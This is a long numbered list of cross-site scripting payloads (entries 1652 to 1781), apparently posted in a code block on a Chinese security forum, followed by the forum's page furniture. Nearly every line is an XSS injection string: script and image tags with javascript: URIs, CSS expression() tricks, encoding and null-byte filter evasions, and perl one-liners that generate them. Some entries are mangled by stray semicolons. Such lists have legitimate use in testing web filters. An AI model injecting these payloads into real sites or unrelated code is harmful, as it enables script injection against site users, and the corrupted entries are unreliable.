  1652. <IMG SRC="jav&#x0A;ascript:alert(2258);">
  1653. <IMG SRC="jav&#x0D;ascript:alert(2259);">
  1654. perl -e &apos;print "<IMG SRC=java\0script:alert(2261)>";&apos;> out
  1655. perl -e &apos;print "&<SCR\0IPT>alert(2262)</SCR\0IPT>";&apos; > out
  1656. <IMG SRC=" &#14;  javascript:alert(2263);">
  1657. <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(2265)>
  1658. <IMG SRC="javascript:alert(2268)"
  1659. <<SCRIPT>alert(2270);//<</SCRIPT>
  1660. <IMG """><SCRIPT>alert(2271)</SCRIPT>">
  1661. "><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(2390)>
  1662. </script><script>alert(2391)</script>
  1663. </br style=a:expression(alert(23922392>
  1664. <scrscriptipt>alert(2393)</scrscriptipt>
  1665. <br size=\"&{alert(2394)}\">
  1666. perl -e 'print \"<IMG SRC=java\0script:alert(2395)>\";' > out
  1667. perl -e 'print \"<SCR\0IPT>alert(2396)</SCR\0IPT>\";' > out
  1668. <~/XSS/*-*/STYLE=xss:e/**/xpression(alert(2397))>
  1669. <~/XSS/*-*/STYLE=xss:e/**/xpression(alert(2399))>
  1670. <~/XSS STYLE=xss:expression(alert(2400))>
  1671. "><script>alert(2401)</script>
  1672. </XSS/*-*/STYLE=xss:e/**/xpression(alert(2402))>
  1673. XSS/*-*/STYLE=xss:e/**/xpression(alert(2403))>
  1674. XSS STYLE=xss:e/**/xpression(alert(2404))>
  1675. </XSS STYLE=xss:expression(alert(2405))>
  1676. ';;alert(2406))//\';;alert(2406))//";;alert(2406))//\";;alert(2406))//-->;<;/SCRIPT>;";>;';>;<;SCRIPT>;alert(2406))<;/SCRIPT>;
  1677. <;SCRIPT>;alert(2408)<;/SCRIPT>;
  1678. <;SCRIPT>;alert(2410))<;/SCRIPT>;
  1679. <;BASE HREF=";javascript:alert(2411);//";>;
  1680. <;BGSOUND SRC=";javascript:alert(2412);";>;
  1681. <;BODY BACKGROUND=";javascript:alert(2413);";>;
  1682. <;BODY ONLOAD=alert(2414)>;
  1683. <;DIV STYLE=";background-image: url(javascript:alert(2415))";>;
  1684. <;DIV STYLE=";background-image: url(&;#1;javascript:alert(2416))";>;
  1685. <;DIV STYLE=";width: expression(alert(2417));";>;
  1686. <;FRAMESET>;<;FRAME SRC=";javascript:alert(2418);";>;<;/FRAMESET>;
  1687. <;IFRAME SRC=";javascript:alert(2419);";>;<;/IFRAME>;
  1688. <;INPUT TYPE=";IMAGE"; SRC=";javascript:alert(2420);";>;
  1689. <;IMG SRC=";javascript:alert(2421);";>;
  1690. <;IMG SRC=javascript:alert(2422)>;
  1691. <;IMG DYNSRC=";javascript:alert(2423);";>;
  1692. <;IMG LOWSRC=";javascript:alert(2424);";>;
  1693. <;STYLE>;li {list-style-image: url(";javascript:alert(2428)";);}<;/STYLE>;<;UL>;<;LI>;XSS
  1694. %BCscript%BEalert(2432)%BC/script%BE
  1695. <;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=javascript:alert(2433);";>;
  1696. <;META HTTP-EQUIV=";refresh"; CONTENT=";0; URL=http://;URL=javascript:alert(2435);";>;
  1697. <;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389>;<;param name=url value=javascript:alert(2438)>;<;/OBJECT>;
  1698. a=";get";;&;#10;b=";URL(";";;&;#10;c=";javascript:";;&;#10;d=";alert(2440);";)";;
  1699. eval(a+b+c+d);
  1700. <;STYLE TYPE=";text/javascript";>;alert(2441);<;/STYLE>;
  1701. <;IMG STYLE=";xss:expr/*XSS*/ession(alert(2442))";>;
  1702. <;XSS STYLE=";xss:expression(alert(2443))";>;
  1703. <;STYLE>;.XSS{background-image:url(";javascript:alert(2444)";);}<;/STYLE>;<;A CLASS=XSS>;<;/A>;
  1704. <;STYLE type=";text/css";>;BODY{background:url(";javascript:alert(2445)";)}<;/STYLE>;
  1705. <;LINK REL=";stylesheet"; HREF=";javascript:alert(2446);";>;
  1706. <;TABLE BACKGROUND=";javascript:alert(2451)";>;<;/TABLE>;
  1707. <;TABLE>;<;TD BACKGROUND=";javascript:alert(2452)";>;<;/TD>;<;/TABLE>;
  1708. <;XML ID=I>;<;X>;<;C>;<;![CDATA[<;IMG SRC=";javas]]>;<;![CDATA[cript:alert(2454);";>;]]>;
  1709. <;XML ID=";xss";>;<;I>;<;B>;<;IMG SRC=";javas<;!-- -->;cript:alert(2455)";>;<;/B>;<;/I>;<;/XML>;
  1710. <;META HTTP-EQUIV=";Set-Cookie"; Content=";USERID=<;SCRIPT>;alert(2459)<;/SCRIPT>;";>;
  1711. <;BR SIZE=";&;{alert(2464)}";>;
  1712. <;IMG SRC=JaVaScRiPt:alert(2465)>;
  1713. <;IMG SRC=javascript:alert(2466)>;
  1714. <;IMG SRC=`javascript:alert(2467)`>;
  1715. <;IMG SRC=javascript:alert(2468))>;
  1716. <;HEAD>;<;META HTTP-EQUIV=";CONTENT-TYPE"; CONTENT=";text/html; charset=UTF-7";>; <;/HEAD>;+ADw-SCRIPT+AD4-alert(2473);+ADw-/SCRIPT+AD4-
  1717. \";;alert(2474);//
  1718. <;/TITLE>;<;SCRIPT>;alert(2475);<;/SCRIPT>;
  1719. <;STYLE>;@im\port';\ja\vasc\ript:alert(2476)';;<;/STYLE>;
  1720. <;IMG SRC=";jav        ascript:alert(2477);";>;
  1721. <;IMG SRC=";jav&;#x09;ascript:alert(2478);";>;
  1722. <;IMG SRC=";jav&;#x0A;ascript:alert(2479);";>;
  1723. <;IMG SRC=";jav&;#x0D;ascript:alert(2480);";>;
  1724. perl -e ';print ";<;IM SRC=java\0script:alert(2482)>";;';>; out
  1725. perl -e ';print ";&;<;SCR\0IPT>;alert(2483)<;/SCR\0IPT>;";;'; >; out
  1726. <;IMG SRC="; &;#14;  javascript:alert(2484);";>;
  1727. <;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(2486)>;
  1728. <;IMG SRC=";javascript:alert(2489)";
  1729. <;<;SCRIPT>;alert(2491);//<;<;/SCRIPT>;
  1730. <;IMG ";";";>;<;SCRIPT>;alert(2492)<;/SCRIPT>;";>;
  1731. ";>;<;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(2611)>;
  1732. <;/script>;<;script>;alert(2612)<;/script>;
  1733. <;/br style=a:expression(alert(26132613>;
  1734. <;scrscriptipt>;alert(2614)<;/scrscriptipt>;
  1735. <;br size=\";&;{alert(2615)}\";>;
  1736. perl -e 'print \";<;IMG SRC=java\0script:alert(2616)>;\";;' >; out
  1737. perl -e 'print \";<;SCR\0IPT>;alert(2617)<;/SCR\0IPT>;\";;' >; out
  1738. <~/XSS/*-*/STYLE=xss:e/**/xpression(alert(2618))>
  1739. <~/XSS/*-*/STYLE=xss:e/**/xpression(alert(2620))>
  1740. <~/XSS STYLE=xss:expression(alert(2621))>
  1741. "><script>alert(2622)</script>
  1742. </XSS/*-*/STYLE=xss:e/**/xpression(alert(2623))>
  1743. XSS/*-*/STYLE=xss:e/**/xpression(alert(2624))>
  1744. XSS STYLE=xss:e/**/xpression(alert(2625))>
  1745. </XSS STYLE=xss:expression(alert(2626))>
  1746. >"><script>alert(2627)</script>&
  1747. "><STYLE>@import"javascript:alert(2628)";</STYLE>
  1748. >"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(2629)>
  1749. >%22%27><img%20src%3d%22javascript:alert(2630)%22>
  1750. '%uff1cscript%uff1ealert(2631)%uff1c/script%uff1e'
  1751. <IMG SRC="javascript:alert(2633);">
  1752. <IMG SRC=javascript:alert(2634)>
  1753. <IMG SRC=JaVaScRiPt:alert(2635)>
  1754. <IMG SRC=JaVaScRiPt:alert(2636)>
  1755. <IMG SRC="jav
  1756. ascript:alert(2640);">
  1757. <IMG SRC="jav
    ascript:alert(2641);">
  1758. <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert(2643);<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
  1759. <script>alert(2649)</script>
  1760. %3cscript%3ealert(2650)%3c/script%3e
  1761. %22%3e%3cscript%3ealert(2651)%3c/script%3e
  1762. <IMG SRC="javascript:alert(2652);">
  1763. <IMG SRC=javascript:alert(2653)>
  1764. <IMG SRC=javascript:alert(2654)>
  1765. <img src=xss onerror=alert(2655)>
  1766. <IMG """><SCRIPT>alert(2656)</SCRIPT>">
  1767. <IMG SRC=javascript:alert(2657))>
  1768. <IMG SRC="jav ascript:alert(2658);">
  1769. <IMG SRC="jav        ascript:alert(2659);">
  1770. <BODY BACKGROUND="javascript:alert(2663)">
  1771. <BODY ONLOAD=alert(2664)>
  1772. <INPUT TYPE="IMAGE" SRC="javascript:alert(2665);">
  1773. <IMG SRC="javascript:alert(2666)"
  1774. <<SCRIPT>alert(2668);//<</SCRIPT>
  1775. %253cscript%253ealert(2669)%253c/script%253e
  1776. "><s"%2b"cript>alert(2670)</script>
  1777. foo<script>alert(2671)</script>
  1778. <scr<script>ipt>alert(2672)</scr</script>ipt>
  1779. ';alert(2674))//\';alert(2674))//";alert(2674))//\";alert(2674))//--></SCRIPT>">'><SCRIPT>alert(2674))</SCRIPT>
  1780. <marquee onstart='javascript:alert(2675);'>=(◕_◕)=
  1781. </span></span><svg onload="alert(2676)//“ #"="">
复制代码
您需要登录后才可以回帖 登录 | 注册

本版积分规则

风雨兼程82 LV4.上士

粉丝:5 关注:4 积分:827

精华:0 金币:984 经验:721

最后登录时间:2019-10-22

公测360家庭防火墙V5S 公测360防火墙5P 360会员商城青铜会员

私信 加好友

最新活动

用户代言人活动

排行榜

热度排行 查看排行
今日 本周 本月 全部
    今日 本周 本月 全部

      内容推荐 热门推荐最新主帖

        关注360粉丝团,回复:抽奖,每周抽一个锦鲤大奖,等啥呢?扫它!!!

        快速回复 返回顶部 返回列表